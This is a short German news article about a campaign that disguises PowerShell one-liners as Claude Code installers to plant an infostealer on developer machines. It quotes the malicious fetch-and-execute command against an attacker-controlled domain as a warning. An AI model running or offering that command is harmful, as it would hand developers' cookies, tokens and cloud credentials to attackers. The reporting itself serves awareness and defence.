🚨 KI-CRIME
Fake Claude-Installer klauen Dev-Secrets
Eine aktive Kampagne kapert Entwickler-Rechner mit getarnten Claude-Code-Installern. Wer den falschen Einzeiler ins Terminal kippt, lädt sich einen Infostealer auf die Maschine.
Eine aktive Kampagne kapert Entwickler-Rechner mit getarnten Claude-Code-Installern. Wer den falschen Einzeiler ins Terminal kippt, lädt sich einen Infostealer auf die Maschine.
Was konkret passiert ist
Angreifer ahmen den offiziellen Install-Befehl von Anthropic nach. Statt `irm https://claude.ai/install.ps1 | iex` läuft im Hintergrund `irm events.msft23.com | iex`. Sieht harmlos aus. Ist es nicht.
Ontinue-Forscher haben die Kampagne enttarnt. Ziel: Cookies, Session-Tokens, API-Keys, Cloud-Credentials.
Zahlenbox
- 1 Zeile** — reicht für den kompletten Compromise
- Mehrere Monate** — laufen ähnliche Dev-Tool-Lures schon
- Claude Code & Co.** — als Köder missbraucht
- Microsoft-Domain** — vorgetäuscht über `msft23.com`
So läuft der Angriff
- Köder:** Fake-Installer im Stil offizieller Setup-Anleitungen
- Lieferweg:** PowerShell-Einzeiler aus dubiosen Quellen
- Payload:** Infostealer greift Browser-Cookies und Dev-Credentials ab
- Ziel:** Zugriff auf GitHub, Cloud-Konsolen, interne Systeme
💡 Was das bedeutet
Entwickler sind das neue Lieblingsopfer. Wer Zugang zu Repos, CI-Pipelines und Cloud-Accounts hat, ist Goldwert — ein gestohlenes Token öffnet ganze Firmen. Copy-Paste aus Stack Overflow, Discord oder Google-Treffern wird zur echten Gefahr.
“
Der Trick ist banal: Eine Domain austauschen, den Rest macht der Entwickler selbst.
🤖 NERDMAN-URTEIL
Wer Install-Befehle blind ins Terminal pastet, gehört nicht an die Tastatur — prüft die verdammte Domain.
Quelle: The Register AI
War dieser Artikel hilfreich?
Dein Feedback hilft uns, bessere Artikel zu liefern.